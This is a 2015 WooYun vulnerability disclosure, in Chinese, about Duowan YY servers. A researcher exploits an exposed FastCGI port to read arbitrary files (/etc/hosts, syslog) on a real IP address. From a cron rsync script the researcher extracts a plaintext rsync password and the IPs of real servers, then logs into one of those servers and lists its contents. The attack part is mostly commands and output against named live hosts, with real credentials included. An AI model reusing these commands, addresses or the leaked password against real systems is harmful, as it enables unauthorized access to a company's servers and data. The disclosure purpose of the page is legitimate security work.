当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-095629

漏洞标题:多玩YY某服务配置不当可读任意文件(连带多个rsync服务器可控制)

相关厂商:广州多玩

漏洞作者: boooooom

提交时间:2015-02-04 16:00

修复时间:2015-02-09 16:02

公开时间:2015-02-09 16:02

漏洞类型:敏感信息泄露

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-02-04: 细节已通知厂商并且等待厂商处理中
2015-02-09: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT

详细说明:

依然是fastcgi的问题,222.134.66.98这个ip

[root@localhost fastcgi]$ /usr/local/php/bin/php fcgiget.php 222.134.66.98:9000/etc/hosts
X-Powered-By: PHP/5.2.6-3ubuntu4.6
Content-type: text/html
127.0.0.1 localhost
222.134.66.98 ubuntu
# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
ff02::3 ip6-allhosts
58.249.119.209 smproxy1.yy.duowan.com
112.65.241.7 smproxy2.yy.duowan.com
59.151.23.85 smproxy3.yy.duowan.com
106.38.198.9 manager.repos.yy.duowan.com
118.26.226.207 sdaemon.yy.duowan.com
58.249.119.217 sdaemon2.yy.duowan.com
58.248.187.58 yycookie.yy.duowan.com
58.249.119.217 rdaemon.yy.duowan.com
118.26.226.207 rdaemon2.yy.duowan.com
58.249.119.217 relayDaemon.yy.duowan.com
118.26.226.207 relayDaemon2.yy.duowan.com
58.249.119.211 balance.yy.duowan.com
221.228.79.31 bc.yy.duowan.com
221.228.79.32 bc2.yy.duowan.com
121.14.37.153 config.yy.duowan.com
58.215.46.21 mirror.yy.duowan.com
121.14.43.142 oams.yy.duowan.com
106.38.255.130 oams2.yy.duowan.com


读下syslog看看

[root@localhost fastcgi]$ /usr/local/php/bin/php fcgiget.php 222.134.66.98:9000/var/log/syslog|grep rsync
Feb 4 05:30:01 ubuntu /USR/SBIN/CRON[7100]: (root) CMD (/bin/bash /home/dspeak/rsync_jifen.sh)
Feb 4 05:30:01 ubuntu /USR/SBIN/CRON[7102]: (root) CMD (/bin/bash /home/dspeak/check_rsync_jifen.sh)
Feb 4 05:40:01 ubuntu /USR/SBIN/CRON[19136]: (root) CMD (rsync -avzP /data/yy/log/STATLOG/*.gz sys_log@222.88.95.237::sys_log/222_134_66_98 --password-file=/data/yy/log/STATLOG/pass.scr)
Feb 4 06:00:01 ubuntu /USR/SBIN/CRON[7887]: (root) CMD (/bin/bash /home/dspeak/rsync_jifen.sh)
Feb 4 06:00:01 ubuntu /USR/SBIN/CRON[7892]: (root) CMD (/bin/bash /home/dspeak/check_rsync_jifen.sh)
Feb 4 06:30:01 ubuntu /USR/SBIN/CRON[11029]: (root) CMD (/bin/bash /home/dspeak/rsync_jifen.sh)
Feb 4 06:30:01 ubuntu /USR/SBIN/CRON[11034]: (root) CMD (/bin/bash /home/dspeak/check_rsync_jifen.sh)
Feb 4 07:00:01 ubuntu /USR/SBIN/CRON[11999]: (root) CMD (/bin/bash /home/dspeak/check_rsync_jifen.sh)
Feb 4 07:00:01 ubuntu /USR/SBIN/CRON[12004]: (root) CMD (/bin/bash /home/dspeak/rsync_jifen.sh)


这个文件/home/dspeak/rsync_jifen.sh

if [ "$ispType" = "5" ] ; then
# CNC

rsyncServerList="58.249.117.105 122.13.149.246 111.206.234.120"
else
# OTHER ISP
rsyncServerList="121.14.39.137 121.14.43.217 106.38.255.155"
fi
....
for file in $syncList ; do

flag=0

for rsyncServer in $rsyncServerList ; do

rsync -az --password-file=/etc/rsync.scr $file jifen@${rsyncServer}::jifen/$ip/ ; rc=$?

if [ $rc -eq 0 ] ; then

info_short_log "sync file [$file] to [$rsyncServer] succeed , rc=[$rc]"
else
err_short_log "sync file [$file] to [$rsyncServer] failed , rc=[$rc]"
fi

((flag+=$rc))
done


然后某个文件里面有这个密码,具体哪个我忘记了,对不起

echo 1qazxcv > /etc/rsync.scr
chmod 600 /etc/rsync.scr
else
if [ ! -s /etc/rsync.scr ];then
echo 1qazxcv > /etc/rsync.scr
chmod 600 /etc/rsync.scr
fi

漏洞证明:

不知道内容是啥,看不懂

[root@localhost fastcgi]$ rsync jifen@58.249.117.105::jifen |more
Password:
drwxr-xr-x 102400 2015/02/03 14:00:13 .
drwxr-xr-x 36864 2015/02/04 15:00:06 101.226.185.140
drwxr-xr-x 32768 2015/02/04 15:30:14 101.226.185.145
drwxr-xr-x 49152 2015/02/04 15:30:04 101.226.185.39
drwxr-xr-x 53248 2015/02/04 15:30:06 101.226.185.40
drwxr-xr-x 36864 2015/02/04 15:30:08 101.226.185.41
drwxr-xr-x 36864 2015/02/04 15:30:03 101.226.185.44
drwxr-xr-x 28672 2015/02/04 15:30:01 101.226.185.45
drwxr-xr-x 36864 2015/02/04 15:30:02 101.226.185.46
drwxr-xr-x 36864 2015/02/04 15:30:04 101.226.185.47
drwxr-xr-x 36864 2015/02/04 15:30:02 101.226.185.48
drwxr-xr-x 36864 2015/02/04 15:30:08 101.226.185.49
drwxr-xr-x 36864 2015/02/04 15:30:02 101.226.185.50
drwxr-xr-x 36864 2015/02/04 15:30:18 101.226.185.51
drwxr-xr-x 36864 2015/02/04 15:30:03 101.226.185.52
drwxr-xr-x 36864 2015/02/04 15:30:04 101.226.185.53
drwxr-xr-x 36864 2015/02/04 15:30:09 101.226.185.54
drwxr-xr-x 36864 2015/02/04 15:30:03 101.226.185.55
drwxr-xr-x 32768 2015/02/04 15:30:02 101.226.185.59
drwxr-xr-x 36864 2015/02/04 15:30:07 101.226.185.60
drwxr-xr-x 36864 2015/02/04 15:30:06 101.226.185.61
drwxr-xr-x 36864 2015/02/04 15:30:02 101.226.185.62
drwxr-xr-x 4096 2015/02/04 14:30:02 101.4.56.118
drwxr-xr-x 4096 2015/02/04 14:30:06 101.4.56.84
drwxr-xr-x 4096 2015/02/04 15:00:02 101.4.56.85
drwxr-xr-x 4096 2015/02/04 14:30:02 101.4.56.86

修复方案:

访问控制

版权声明:转载请注明来源 boooooom@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-02-09 16:02

厂商回复:

最新状态:

暂无


漏洞评价:

评论

  1. 2015-02-04 17:22 | 猪猪侠 认证白帽子 ( 核心白帽子 | Rank:3224 漏洞数:254 | 你都有那么多超级棒棒糖了,还要自由干吗?)

    提醒了我两次

  2. 2015-02-04 17:28 | 浩天 认证白帽子 ( 普通白帽子 | Rank:915 漏洞数:79 | 度假中...)

    @猪猪侠 有人捣乱,猜猜是谁